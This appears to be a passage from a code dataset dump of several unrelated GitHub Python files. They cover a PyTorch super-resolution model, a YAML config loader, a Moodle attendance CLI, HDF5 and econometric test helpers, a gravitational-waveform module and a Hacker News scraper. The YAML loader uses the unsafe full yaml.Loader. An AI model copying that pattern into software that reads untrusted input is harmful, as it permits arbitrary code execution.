(RCAB)\nclass RCAB(nn.Module):\n def __init__(\n self, conv, n_feat, kernel_size, reduction,\n res_scale=1, deploy=False):\n\n super(RCAB, self).__init__()\n self.in_channels = n_feat\n self.groups = 1\n self.res_scale = res_scale\n self.deploy = deploy\n self.se = nn.Identity() \n r = 16\n \n if deploy:\n self.body_reparam = nn.Conv2d(in_channels=n_feat, out_channels=n_feat, kernel_size=kernel_size, stride=1,\n padding=1, dilation=1, groups=1, bias=False)\n \n else:\n self.body_identity = None\n \n self.body_dense = Conv(n_feat, r*n_feat, kernel_size, 1, 1, 1)\n self.body_dense_1x1 = Conv(r*n_feat, n_feat, 1, 1, 0, 1)\n self.body_1x1 = Conv(n_feat, n_feat, 1, 1, 0, 1)\n #print('Rep Block, identity = ', self.body_identity)\n\n def forward(self, x):\n if hasattr(self, 'body_reparam'):\n return self.body_reparam(x)\n else:\n if self.body_identity is None:\n id_out = 0\n else: \n id_out = self.body_identity(x)\n y = self.body_dense(x)\n y = self.body_dense_1x1(y)\n return y + self.body_1x1(x) + id_out\n \n def get_equivalent_kernel_bias(self):\n kernel3x3, bias3x3 = self._fuse_tensor(self.body_dense)\n kernel1x1, bias1x1 = self._fuse_tensor(self.body_1x1)\n kernelid, biasid = self._fuse_tensor(self.body_identity)\n return kernel3x3 + self._pad_1x1_to_3x3_tensor(kernel1x1) + kernelid, None#bias3x3 + bias1x1 + biasid\n\n def _pad_1x1_to_3x3_tensor(self, kernel1x1):\n if kernel1x1 is None:\n return 0\n else:\n return torch.nn.functional.pad(kernel1x1, [1,1,1,1])\n\n\n def _fuse_tensor(self, branch):\n \n if branch is None:\n return 0, 0\n if isinstance(branch, nn.Sequential):\n kernel = branch.conv.weight \n else:\n assert isinstance(branch, nn.BatchNorm2d)\n if not hasattr(self, 'id_tensor'):\n input_dim = self.in_channels // self.groups\n kernel_value = np.zeros((self.in_channels, input_dim, 3, 3), dtype=np.float32)\n \n for i in range(self.in_channels):\n kernel_value[i, i % input_dim, 1, 1] = 1\n self.id_tensor = torch.from_numpy(kernel_value)\n kernel = self.id_tensor\n return kernel, None \n\n def switch_to_deploy(self):\n if hasattr(self, 'body_reparam'):\n return\n kernel, bias = self.get_equivalent_kernel_bias()\n self.body_reparam = nn.Conv2d(in_channels=self.body_dense.conv.in_channels, out_channels=self.body_dense.conv.out_channels,\n kernel_size=self.body_dense.conv.kernel_size, stride=self.body_dense.conv.stride,\n padding=self.body_dense.conv.padding, dilation=self.body_dense.conv.dilation, groups=self.body_dense.conv.groups, bias=False)\n\n self.body_reparam.weight.data = kernel\n for para in self.parameters():\n para.detach_()\n self.__delattr__('body_dense')\n self.__delattr__('body_1x1')\n if hasattr(self, 'body_identity'):\n self.__delattr__('body_identity')\n\n## RonvGroup\nclass ConvGroup(nn.Module):\n def __init__(\n self, conv, in_feat, mid_feat, out_feat, kernel_size, deploy=False):\n\n super(ConvGroup, self).__init__()\n self.deploy = deploy\n \n if deploy:\n self.body_reparam = nn.Conv2d(in_channels=in_feat, out_channels=out_feat, kernel_size=kernel_size, stride=1,\n padding=(kernel_size - 1) // 2, dilation=1, groups=1, bias=False)\n else:\n self.body_dense = Conv(in_feat, mid_feat, kernel_size, 1, (kernel_size - 1) // 2, 1)\n self.body_1x1 = Conv(mid_feat, out_feat, 1, 1, 0, 1)\n \n def forward(self, x):\n if hasattr(self, 'body_reparam'):\n return self.body_reparam(x)\n else:\n x = self.body_dense(x)\n x = self.body_1x1(x) \n return x\n\n def merge_tensor(self):\n kernel5x5 = self.body_dense.conv.weight\n kernel1x1 = self.body_1x1.conv.weight\n return torch.conv2d(kernel5x5.permute(1, 0, 2, 3), kernel1x1.flip(-1, -2), padding=0).permute(1, 0, 2, 3)\n\n def switch_to_deploy(self):\n if hasattr(self, 'body_reparam'):\n return\n kernel = self.merge_tensor()\n self.body_reparam = nn.Conv2d(in_channels=self.body_dense.conv.in_channels, out_channels=self.body_1x1.conv.out_channels,\n kernel_size=self.body_dense.conv.kernel_size, stride=self.body_dense.conv.stride,\n padding=self.body_dense.conv.padding, dilation=self.body_dense.conv.dilation, groups=self.body_dense.conv.groups, bias=False)\n\n self.body_reparam.weight.data = kernel\n for para in self.parameters():\n para.detach_()\n self.__delattr__('body_dense')\n self.__delattr__('body_1x1')\n \nclass ResidualGroup(nn.Module):\n def __init__(self, conv, n_feat, kernel_size, reduction, res_scale, n_resblocks, deploy):\n super(ResidualGroup, self).__init__()\n self.deploy = deploy \n modules_body = []\n modules_body = [\n RCAB(\n conv, n_feat, kernel_size, reduction, res_scale=1, deploy=self.deploy) \\\n for _ in range(n_resblocks)]\n self.body = nn.Sequential(*modules_body)\n self.act = nn.ReLU()\n\n def forward(self, x):\n res = self.body(x)\n res += x\n return self.act(res)\n\nclass SESR(nn.Module):\n def __init__(self, in_channels:int, return_outs:bool, gen_cfg=None, scale:int=2, conv=common.default_conv):\n super(SESR, self).__init__()\n \n # n_resgroups = 11\n # n_resblocks = 1\n # n_feats = 16\n # kernel_size = 3\n # reduction = 16\n # scale = 1\n # act = nn.PReLU()\n # deploy = False\n # res_scale = 1\n # self.deploy = deploy \n\n n_resgroups = 7\n n_resblocks = 1\n n_feats = 16\n kernel_size = 3\n reduction = 16\n scale = 1\n act = nn.PReLU()\n deploy = False\n res_scale = 1\n self.deploy = deploy \n\n # define head module\n self.head = ConvGroup(conv, in_feat=15, mid_feat=256, out_feat=n_feats, kernel_size=5, deploy=deploy)\n \n # define body module\n modules_body = [\n ResidualGroup(\n conv, n_feats, kernel_size, reduction, res_scale=res_scale, n_resblocks=n_resblocks, deploy=deploy) \\\n for _ in range(n_resgroups)]\n\n self.body = nn.Sequential(*modules_body)\n \n # define tail module\n self.tail = ConvGroup(conv, in_feat=n_feats, mid_feat=256, out_feat=scale*scale*16, kernel_size=5, deploy=deploy)\n\n def forward(self, x): \n x = self.head(x)\n res = self.body(x)\n res = res + x\n res = self.tail(res)\n return res \n\n def reset(self):\n self.head.reset()\n for m in self.body:\n m.reset()\n self.tail.reset()\n \n def detach(self):\n self.head.detach()\n for m in self.body:\n m.detach()\n self.tail.detach()\n\n def load_state_dict(self, state_dict, strict=False):\n own_state = self.state_dict()\n for name, param in state_dict.items():\n if name in own_state:\n if isinstance(param, nn.Parameter):\n param = param.data\n try:\n own_state[name].copy_(param)\n except Exception:\n if name.find('tail') >= 0:\n print('Replace pre-trained upsampler to new one...')\n else:\n raise RuntimeError('While copying the parameter named {}, '\n 'whose dimensions in the model are {} and '\n 'whose dimensions in the checkpoint are {}.'\n .format(name, own_state[name].size(), param.size()))\n elif strict:\n if name.find('tail') == -1:\n raise KeyError('unexpected key \"{}\" in state_dict'\n .format(name))\n\n if strict:\n missing = set(own_state.keys()) - set(state_dict.keys())\n if len(missing) > 0:\n raise KeyError('missing keys in state_dict: \"{}\"'.format(missing))\n\n\ndef model_convert(model:torch.nn.Module, save_path=None, do_copy=True):\n if do_copy:\n model = copy.deepcopy(model)\n for module in model.modules():\n if hasattr(module, 'switch_to_deploy'):\n module.switch_to_deploy()\n if save_path is not None:\n torch.save(model.state_dict(), save_path)\n print('Save converted model in: ', save_path)\n return model\n","repo_name":"wanglixilinx/CDCL","sub_path":"sesr.py","file_name":"sesr.py","file_ext":"py","file_size_in_byte":9898,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"27052707200","text":"import logging\n\nfrom dq0.sdk.errors.errors import fatal_error\nfrom dq0.sdk.utils.managed_classes import custom_objects\n\nimport yaml\n\nlogger = logging.getLogger()\n\n\nclass YamlConfig():\n \"\"\"Yaml parser for tf.keras models\n\n Yaml parser class for tf.Keras config files.\n \"\"\"\n\n def __init__(self,\n yaml_path,\n yaml_dict=None,\n custom_objects=custom_objects):\n self.yaml_str = None\n self.yaml_path = yaml_path\n self.custom_objects = custom_objects\n if yaml_dict is None:\n self.read_yaml_file()\n else:\n self.yaml_dict = yaml_dict\n\n def read_yaml_file(self):\n \"\"\"Reads yaml file\n\n This function parses a yaml file to self.yaml_dict\n \"\"\"\n try:\n with open(self.yaml_path, 'r') as yaml_file:\n self.yaml_dict = yaml.load(yaml_file, Loader=yaml.Loader) # turnsout SafeLoader doesnt recognise !!python/tuple\n except Exception as e:\n fatal_error('Could not find config at {}! {}'.format(\n self.yaml_path, e), logger=logger)\n return self.yaml_dict\n\n def save_yaml(self):\n \"\"\"Save yaml dict to a yaml file\"\"\"\n try:\n with open(self.yaml_path, 'w') as yaml_file:\n yaml_file.write(self.yaml_dict)\n except Exception as e:\n fatal_error('Cannot write yaml to {}! {}'.format(\n self.yaml_path, e), logger=logger)\n\n def dump_yaml(self, yaml_dict):\n self.yaml_str = yaml.dump(yaml_dict)\n return self.yaml_str\n","repo_name":"gradientzero/dq0-sdk","sub_path":"dq0/sdk/utils/yaml_config.py","file_name":"yaml_config.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"1709768076","text":"#! python 3\n#! utf-8\n\nimport getpass\nimport re\nimport requests\nimport sys\n\nfrom bs4 import BeautifulSoup\nfrom helper_functions import *\n\nif __name__ == \"__main__\":\n # check if timetable.json exist\n doTimetableExist()\n # get argument from terminal\n param = sys.argv[1:] # this decides what the program will do\n if (len(param) == 0):\n print('Usage: python main.py .')\n print(\"\"\"\n Features currently available:\n 1. Automatic Attendance \n 2. Automatic Attendance (Replacement Class) \n 3. Search for a Subject \n \"\"\")\n else:\n if (param[0] == 'attend'):\n if ('replace' in param[1:]):\n attend(replace=True)\n else:\n attend()\n\n elif (param[0] == 'search'):\n if (len(param[1:]) == 0):\n print('Usage: python main.py search .')\n\n if len(param[1:]) > 1:\n\n for course in param[1:]:\n content = search(course)\n print(f\"Search : {course}\")\n\n for (index, result) in enumerate(content, start=1):\n print(f\"{index} : {result}\")\n print()\n\n for course in param[1:]:\n option = input(f\"Enter n if your course is not here!\\nChoose one of the courses ({course}):\")\n if(option == 'n'):\n retry = input(f\"Search {course}: \")\n content = search(retry)\n\n for (index, result) in enumerate(content, start=1):\n print(f\"{index} : {result}\")\n print()\n else:\n course_id = list(content.values())[int(option)-1]\n course_fullName = list(content.keys())[int(option)-1]\n\n register(course_fullName, course_id)\n\n else:\n content = search(param[1])\n\n # Receive possible search results\n if len(content) > 1:\n for (index, result) in enumerate(content, start=1):\n print(f\"{index} : {result}\")\n print()\n\n option = input(\"Enter n if your course is not here!\\nChoose one of the courses : \")\n\n if(option == 'n'):\n retry = input(\"Search : \")\n content = search(retry)\n\n for (index, result) in enumerate(content, start=1):\n print(f\"{index} : {result}\")\n print()\n\n else :\n course_id = list(content.values())[int(option)-1]\n course_fullName = list(content.keys())[int(option)-1]\n\n register(course_fullName, course_id)\n\n else:\n print(\"That feature is currently not available.\\nPlease try it again.\")\n","repo_name":"kuanyi-ng/Auto-Moodle-Attendance","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24918598435","text":"from hdf5io import *\nfrom numpy import array \n\ndef testsavetypes():\n \"\"\" Test saveing supported variable types \"\"\"\n varint = 1\n varfloat = 3.14159\n varstring=\"test string\"\n varcomplex=(1-4j)\n varlist=[1, 32, 3]\n varlists=[1, 32, 'test string']\n vartuple = (1, 2, 3)\n vartuples = (1, 2, 'test string')\n vararray = array([1,2,3])\n #vararrays = array([(1,2,3,'a'), (2,3,5,'b')])\n vararrayc = array( [ [1,2], [3,4] ], dtype=complex )\n\n # Save to file\n hdf5save(\"test.h5\")\n return locals()\n\ndef showfile():\n \"\"\"\" Show file content \"\"\" \n hdf5ls(\"test.h5\")\n\ndef testappend(): \n \"\"\" Test to append variable \"\"\"\n var2=67.3\n hdf5save(\"+test.h5\",'var2',\"/\")\n\ndef testaddgroup():\n \"\"\" Test to add a group \"\"\"\n var2=67.3\n var3=\"group test\"\n hdf5save(\"+test.h5\",'var2',\"/test\")\n\ndef testloadtypes():\n \"\"\" Test loading supported variable types \"\"\"\n hdf5load(\"test.h5\")\n return locals()\n\ndef testloadgroup():\n \"\"\" Test loading variables in a group\"\"\"\n hdf5load(\"test.h5\",\"/test\")\n\ndef hdf5test():\n \"\"\" Main test function \"\"\"\n savedict = testsavetypes()\n showfile()\n #print(savedict)\n loaddict = testloadtypes()\n #print(loaddict)\n if savedict == loaddict:\n print(\"load/save success!\")\n else:\n print(\"load/save FAILURE!\")\n testappend()\n showfile()\n testaddgroup()\n showfile()\n\nif __name__ == '__main__':\n hdf5test()\n","repo_name":"thuswa/pyhdf5io","sub_path":"test/hdf5test.py","file_name":"hdf5test.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37025938795","text":"from functools import partial\nimport sys\n\nfrom scipy.stats import wishart\nimport pandas as pd\nimport numpy as np\n\nfrom respy.python.shared.shared_auxiliary import replace_missing_values\nfrom respy.python.shared.shared_auxiliary import dist_class_attributes\nfrom respy.python.shared.shared_constants import TEST_RESOURCES_BUILD\nfrom respy.python.shared.shared_constants import DATA_FORMATS_SIM\nfrom respy.python.shared.shared_constants import DATA_LABELS_SIM\nfrom respy.python.shared.shared_auxiliary import create_draws\nfrom respy_smm.MaximumLikelihoodEstimation import MaximumLikelihoodEstimationCls\nfrom respy_smm.SimulationBasedEstimation import SimulationBasedEstimationCls\nfrom respy_smm.auxiliary_depreciation import respy_obj_from_new_init\nfrom respy.python.simulate.simulate_auxiliary import write_out\n\nfrom respy_smm.auxiliary import smm_sample_f2py, get_initial_conditions\nfrom respy_smm.auxiliary_depreciation import respy_ini_old_to_new\nfrom respy.tests.codes.random_init import generate_init\nimport os\nimport copy\nfrom respy.tests.codes.random_init import write_init_file\n\nsys.path.insert(0, TEST_RESOURCES_BUILD)\nimport f2py_interface as respy_f2py\n\n\ndef get_random_point(fname='test.respy.ini'):\n respy_base = respy_obj_from_new_init(fname)\n respy_base.paras_free = ~np.array(respy_base.get_attr('optim_paras')['paras_fixed'])\n values = list()\n bounds = respy_base.get_attr('optim_paras')['paras_bounds']\n for i, is_free in enumerate(respy_base.paras_free):\n if not is_free:\n continue\n lower, upper = [-99 * (-1) ** i if e is None else e for i, e in enumerate(bounds[i])]\n values.append(float(np.random.uniform(lower, upper, 1)))\n\n return np.array(values)\n\n\ndef get_random_init(constr=dict()):\n \"\"\"This is a wrapper around the RESPY functionality.\"\"\"\n if 'PMI_SIZE' not in os.environ.keys():\n constr['flag_parallelism_mpi'] = False\n\n # There are some keys that are not part of the RESPY constraints, so these need to be removed\n # first.\n constr_respy = copy.deepcopy(constr)\n constr_respy.pop('flag_agents_equality', None)\n constr_respy.pop('num_procs', None)\n\n constr_respy['flag_interpolation'] = False\n constr_respy['version'] = 'FORTRAN'\n init_dict = generate_init(constr_respy)\n\n # This constraint is not part of the original RESPY coded.\n if 'flag_agents_equality' in constr.keys():\n if constr['flag_agents_equality'] is True:\n init_dict['ESTIMATION']['agents'] = init_dict['SIMULATION']['agents']\n\n if 'num_procs'in constr.keys():\n init_dict['PROGRAM']['procs'] = constr['num_procs']\n\n write_init_file(init_dict)\n\n file_name = 'test.respy.ini'\n respy_ini_old_to_new(file_name, True, file_name)\n\n return init_dict\n\n\ndef get_observed_sample(fname='test.respy.ini'):\n \"\"\"This method simulates a sample based on the initialization file to serve as the\n observed dataset during testing.\n\n We are not using the RESPY capabilities directly as this results in conflicts in case of\n parallel executions with the nested MPIEXEC calls.\n \"\"\"\n respy_base = respy_obj_from_new_init(fname)\n\n labels = list()\n labels += ['num_procs', 'num_periods', 'is_debug', 'seed_emax', 'seed_sim']\n labels += ['num_draws_emax', 'num_agents_sim', 'num_types', 'edu_spec', 'version']\n\n num_procs, num_periods, is_debug, seed_emax, seed_sim, num_draws_emax, num_agents_sim, \\\n num_types, edu_spec, version = dist_class_attributes(respy_base, *labels)\n\n periods_draws_emax = create_draws(num_periods, num_draws_emax, seed_emax, is_debug)\n periods_draws_sims = create_draws(num_periods, num_agents_sim, seed_sim, is_debug)\n\n disturbances = (periods_draws_emax, periods_draws_sims)\n\n # We want to maintain a pure PYTHON version for testing purposes.\n args = list()\n args += [num_periods, num_types, edu_spec['start'], edu_spec['max'], edu_spec['max'] + 1]\n state_space_info = respy_f2py.wrapper_create_state_space(*args)\n\n initial_conditions = get_initial_conditions(respy_base)\n\n simulate_sample = partial(smm_sample_f2py, state_space_info, initial_conditions, disturbances,\n -99)\n\n data_array = replace_missing_values(simulate_sample(respy_base))\n data_frame = pd.DataFrame(data_array, columns=DATA_LABELS_SIM)\n data_frame = data_frame.astype(DATA_FORMATS_SIM)\n data_frame.set_index([\"Identifier\", \"Period\"], drop=False, inplace=True)\n\n write_out(respy_base, data_frame)\n\n return data_frame\n\n\ndef mock_get_weighing_matrix(df):\n num_moments = (df['Period'].max() + 1) * 4\n df = num_moments\n scale = np.identity(num_moments)\n return wishart.rvs(df, scale, size=1)\n\n\ndef mock_get_moments(df):\n moments = dict()\n moments['Choice Probability'] = dict()\n\n info = df['Choice'].groupby('Period').value_counts(normalize=True).to_dict()\n for period in sorted(df['Period'].unique().tolist()):\n moments['Choice Probability'][period] = []\n for choice in range(1, 5):\n try:\n stat = info[(period, choice)]\n except KeyError:\n stat = 0.00\n moments['Choice Probability'][period].append(stat)\n return moments\n\n\ndef run_regression_test(seed):\n\n np.random.seed(seed)\n\n # Generate a new regression vault ...\n get_random_init()\n df = get_observed_sample()\n\n weighing_matrix = mock_get_weighing_matrix(df)\n moments_obs = mock_get_moments(df)\n\n args = ('test.respy.ini', moments_obs, weighing_matrix, mock_get_moments, 5)\n est_obj = SimulationBasedEstimationCls(*args)\n fval_smm = est_obj.info['fval'][0]\n est_obj.terminate(True)\n\n est_obj = MaximumLikelihoodEstimationCls(*('test.respy.ini', 3))\n fval_mle = est_obj.info['fval'][0]\n est_obj.terminate(True)\n rslt = (fval_smm, fval_mle)\n\n return rslt\n","repo_name":"mo2561057/respy_estimagic","sub_path":"respy_smm/tests/auxiliary.py","file_name":"auxiliary.py","file_ext":"py","file_size_in_byte":5857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15625587309","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import interpolate\n\n# simple, early phenom frequency-space waveform according to Ajith et al. (2008)\n# https://arxiv.org/abs/0710.2335\n# Just calculating the amplitude and phase here (latter is relative, so you have to choose an offset)\n\na1 = 2.9740e-1\na2 = 5.9411e-1\na3 = 5.0801e-1\na4 = 8.4845e-1\n\nb1 = 4.4810e-2\nb2 = 8.9794e-2\nb3 = 7.7515e-2\nb4 = 1.2848e-1\n\nc1 = 9.5560e-2\nc2 = 1.9111e-1\nc3 = 2.2369e-2\nc4 = 2.7299e-1\n\n\n\ndef AmpLow(f,C,f1):\n\n return C*(f/f1)**(-7.0/6.0)\n\n\ndef AmpMid(f,C,f1):\n\n return C*(f/f1)**(-2.0/3.0)\n\n\ndef AmpHigh(f,C,f1,f2,sigma):\n\n w = (np.pi*sigma/2.0)*(f2/f1)**(-2.0/3.0)\n return C*w*(1.0/2.0/np.pi)*sigma/( (f-f2)**2 + sigma**2/4.0)\n\ndef getFmerge(M,eta):\n return (a1*eta**2 +b1*eta + c1)/np.pi/M\n\ndef getFring(M,eta):\n return (a2*eta**2 +b2*eta + c2)/np.pi/M\n\ndef getFcut(M,eta):\n return (a4*eta**2 +b4*eta + c4)/np.pi/M\n\n#Added by John\ndef getFisco(M,eta):\n '''\n Estimate of ISCO frequency \n '''\n af = 3.464102*eta - 3.82116*eta**2 + 3.79245*eta**3 #https://arxiv.org/pdf/1605.01938.pdf\n Z1 = 1 + ( 1 - af**2 )**(1/3) * ( (1+af)**(1/3) + (1-af)**(1/3) )\n Z2 = (3*af**2 + Z1**2)**.5\n rISCO = 3 + Z2 - ( (3-Z1)*(3+Z1+2*Z2) )**.5\n OmegaISCO = 1/(rISCO**1.5+af) #Orbital\n return OmegaISCO/M/np.pi\n\n# get the amplitude as a function of frequency, total mass, reduced mass ratio, and distance\ndef binaryAmp(f,M,eta,d=1.0):\n\n\n #alpha1\n fmerg = getFmerge(M,eta)\n\n fring = getFring(M,eta)\n\n sigma = (a3*eta**2 +b3*eta + c3)/np.pi/M\n\n fcut = getFcut(M,eta)\n\n # Eq. 4.17\n C = M**(5.0/6.0)*fmerg**(-7.0/6.0)*np.sqrt(5.0*eta/24.0)/d/np.pi**(2.0/3.0)\n\n freqs = f\n\n amp1_vals = AmpLow(freqs,C,fmerg)\n amp2_vals = AmpMid(freqs,C,fmerg)\n amp3_vals = AmpHigh(freqs,C,fmerg,fring,sigma)\n\n f_in_bin1 = freqs < fmerg\n f_in_bin2 = (freqs >= fmerg) & (freqs < fring)\n f_in_bin3 = freqs >= fring\n\n amp_vals = f_in_bin1*amp1_vals + f_in_bin2*amp2_vals + f_in_bin3*amp3_vals\n\n # phase calculation\n x0 = 1.7516e-1\n x2 = -5.1571e1\n x3 = 6.5866e2\n x4 = -3.9031e3\n x6 = -2.4874e4\n x7 = 2.5196e4\n\n y0 = 7.9483e-2\n y2 = -1.7595e1\n y3 = 1.7803e2\n y4 = -7.7493e2\n y6 = -1.4892e3\n y7 = 3.3970e2\n\n z0 = -7.2390e-2\n z2 = 1.3253e1\n z3 = -1.5972e2\n z4 = 8.8195e2\n z6 = 4.4588e3\n z7 = -3.9573e3\n\n psi0 = (x0*eta**2 + y0*eta + z0)/eta/(np.pi*M)**( (5.0-0)/3.0)\n psi2 = (x2*eta**2 + y2*eta + z2)/eta/(np.pi*M)**( (5.0-2)/3.0)\n psi3 = (x3*eta**2 + y3*eta + z3)/eta/(np.pi*M)**( (5.0-3)/3.0)\n psi4 = (x4*eta**2 + y4*eta + z4)/eta/(np.pi*M)**( (5.0-4)/3.0)\n psi6 = (x6*eta**2 + y6*eta + z6)/eta/(np.pi*M)**( (5.0-6)/3.0)\n psi7 = (x7*eta**2 + y7*eta + z7)/eta/(np.pi*M)**( (5.0-7)/3.0)\n\n t0 = 0.0\n phi0 = -5400.0\n\n phase_vals = 2.0*np.pi*freqs*t0 + phi0\n phase_vals = phase_vals + psi0*freqs**( (0-5.0)/3.0)\n phase_vals = phase_vals + psi2*freqs**( (2-5.0)/3.0)\n phase_vals = phase_vals + psi3*freqs**( (3-5.0)/3.0)\n phase_vals = phase_vals + psi4*freqs**( (4-5.0)/3.0)\n phase_vals = phase_vals + psi6*freqs**( (6-5.0)/3.0)\n phase_vals = phase_vals + psi7*freqs**( (7-5.0)/3.0)\n\n h = amp_vals*np.exp(1j*phase_vals)\n\n return h\n\n# get *just* the amplitude as a function of frequency, total mass, reduced mass ratio, and distance\ndef binaryAmpOnly(f,M,eta,d=1.0):\n\n\n #alpha1\n fmerg = getFmerge(M,eta)\n\n fring = getFring(M,eta)\n\n sigma = (a3*eta**2 +b3*eta + c3)/np.pi/M\n\n fcut = getFcut(M,eta)\n\n # Eq. 4.17\n C = M**(5.0/6.0)*fmerg**(-7.0/6.0)*np.sqrt(5.0*eta/24.0)/d/np.pi**(2.0/3.0)\n\n freqs = f\n\n amp1_vals = AmpLow(freqs,C,fmerg)\n amp2_vals = AmpMid(freqs,C,fmerg)\n amp3_vals = AmpHigh(freqs,C,fmerg,fring,sigma)\n\n f_in_bin1 = freqs < fmerg\n f_in_bin2 = (freqs >= fmerg) & (freqs < fring)\n f_in_bin3 = freqs >= fring\n\n amp_vals = f_in_bin1*amp1_vals + f_in_bin2*amp2_vals + f_in_bin3*amp3_vals\n \n return amp_vals\n\ndef ThetaFromT(t,M,eta,t_merge=0):\n return (eta/(5*M))*(t_merge - t)\n\ndef tFromTheta(theta,M,eta,t_merge=0):\n return t_merge - theta*(5*M/eta)\n\n# get the approximate time (to merger) for a given frequency\ndef tFromF(f,M,eta, t_merge=0):\n Thetavals = (8*M*f*np.pi)**(-8/3)\n return tFromTheta(Thetavals,M,eta,t_merge)\n \n# get the frequency as a function of time\ndef fFromT(t,M,eta=0.25,t_merge=0):\n \n # Definition of Theta(t) from Eq. (315) of Blanchet's Living Review [https://arxiv.org/abs/1310.1528]\n Thetavals = ThetaFromT(t,M,eta,t_merge)\n #print('args:',t,M,eta,t_merge)\n #print('Thetavals',Thetavals)\n\n # taking this to the negative-one-eighth power to give the actual PN expansion parameter\n ThetaNEG8vals = Thetavals**(-0.125)\n\n # Expressions taken from Eq (316) of Blanchet's Living Review [https://arxiv.org/abs/1310.1528]\n # First few terms in the braces\n\n fac0 = 1.0\n\n fac2 = 743.0/4032.0 + 11.0/48.0*eta\n\n fac3 = -np.pi/5\n\n fac4 = 19583.0/254016.0 + 24401.0/193536.0*eta + 31.0/288.0*eta**2\n\n fac5 = (-11891.0/53760.0 + 109.0/1920.0*eta)*np.pi\n\n xvals = 0.25*ThetaNEG8vals**2*( fac0 + fac2*ThetaNEG8vals**2+ fac3*ThetaNEG8vals**3 + fac4*ThetaNEG8vals**4 + fac5*ThetaNEG8vals**5)\n #print('xvals',xvals)\n \n # compute orbital angular frequency\n omegavals = (xvals**1.5)/M\n \n # return GW frequency\n fvals = 2.0*omegavals/(2.0*np.pi)\n\n #for scalar or array, if x<=0 set fval to nan\n fvals = np.choose(xvals>0,[float('nan'),np.real(fvals)]) \n #print('fvals',fvals)\n return fvals\n\n# get t(f from phase) t=(1/2pi)*dphase/df\n#John's calc\ndef t_of_f(f,M,eta,d=1.0,zero_at_f=0):\n\n # phase calculation\n x0 = 1.7516e-1\n x2 = -5.1571e1\n x3 = 6.5866e2\n x4 = -3.9031e3\n x6 = -2.4874e4\n x7 = 2.5196e4\n\n y0 = 7.9483e-2\n y2 = -1.7595e1\n y3 = 1.7803e2\n y4 = -7.7493e2\n y6 = -1.4892e3\n y7 = 3.3970e2\n\n z0 = -7.2390e-2\n z2 = 1.3253e1\n z3 = -1.5972e2\n z4 = 8.8195e2\n z6 = 4.4588e3\n z7 = -3.9573e3\n\n psi0 = (x0*eta**2 + y0*eta + z0)/eta/(np.pi*M)**( (5.0-0)/3.0)\n psi2 = (x2*eta**2 + y2*eta + z2)/eta/(np.pi*M)**( (5.0-2)/3.0)\n psi3 = (x3*eta**2 + y3*eta + z3)/eta/(np.pi*M)**( (5.0-3)/3.0)\n psi4 = (x4*eta**2 + y4*eta + z4)/eta/(np.pi*M)**( (5.0-4)/3.0)\n psi6 = (x6*eta**2 + y6*eta + z6)/eta/(np.pi*M)**( (5.0-6)/3.0)\n psi7 = (x7*eta**2 + y7*eta + z7)/eta/(np.pi*M)**( (5.0-7)/3.0)\n\n t0 = 0.0\n phi0 = -5400.0\n\n dphase_vals = 2.0*np.pi*t0\n dphase_vals = dphase_vals + psi0*f**( (0-5.0)/3.0 -1 )*(0-5.0)/3.0\n dphase_vals = dphase_vals + psi2*f**( (2-5.0)/3.0 -1 )*(2-5.0)/3.0\n dphase_vals = dphase_vals + psi3*f**( (3-5.0)/3.0 -1 )*(3-5.0)/3.0\n dphase_vals = dphase_vals + psi4*f**( (4-5.0)/3.0 -1 )*(4-5.0)/3.0\n dphase_vals = dphase_vals + psi6*f**( (6-5.0)/3.0 -1 )*(6-5.0)/3.0\n dphase_vals = dphase_vals + psi7*f**( (7-5.0)/3.0 -1 )*(7-5.0)/3.0\n\n t=-dphase_vals/2/np.pi\n if zero_at_f>0: \n t0=t_of_f(zero_at_f,M,eta)\n #print('t0=',t0)\n t=t-t0\n \n return t\n","repo_name":"JohnGBaker/GWI-metrics","sub_path":"src/PhenomWaveform_nonspinning.py","file_name":"PhenomWaveform_nonspinning.py","file_ext":"py","file_size_in_byte":7105,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"3925351540","text":"#!/usr/local/bin/python3\nimport sys\nimport argparse\nfrom argparse import RawTextHelpFormatter\nimport os\n\nif f\"{os.environ['DYLINX_HOME']}/python\" not in sys.path:\n sys.path.append(f\"{os.environ['DYLINX_HOME']}/python\")\nfrom Dylinx import NaiveSubject\n\ndef main(args):\n subject = NaiveSubject(args.config_path)\n for i in range(subject.get_num_perm()):\n subject.step(i)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter)\n parser.add_argument(\n \"-m\",\n \"--mode\",\n type=str,\n choices=[\"reverse\", \"optimize_locks\", \"fix\"],\n required=True,\n help=\"Configuring the operating mode.\"\n )\n parser.add_argument(\n \"-c\",\n \"--config_path\",\n type=str,\n default=f\"{os.getcwd()}/dylinx-config.yaml\",\n help=\n \"Specify the path of subject's config file. It should contain following component\"\n \"\\n1. compile_commands_path\"\n \"\\n2. output_directory_path\"\n \"\\n3. instructions\"\n \"\\n - build_commands\"\n \"\\n - clean_commands\"\n )\n args = parser.parse_args()\n main(args)\n","repo_name":"posutsai/Dylinx","sub_path":"sample/memcached/naive.py","file_name":"naive.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15562084478","text":"import requests \n\npage = requests.get(\"https://hacker-news.firebaseio.com/v0/topstories.json\")\npage.encoding ='utf-8'\nchanging_url = 'https://hacker-news.firebaseio.com/v0/item/16619917.json'\nprint(page.status_code)\ncontent = page.json()\n\n\n#print('json', page.json())\n#print(dir(page))\n#print(help(page.json))\nurls = []\nhtml = \"\\n\"\nfor i in content:\n urls.append(f'https://hacker-news.firebaseio.com/v0/item/{i}.json')\n\nfor url in urls:\n res = requests.get(url)\n ans:dict = res.json()\n #print(ans.keys())\n\n link = ans.get('url')\n author=ans['by']\n title = 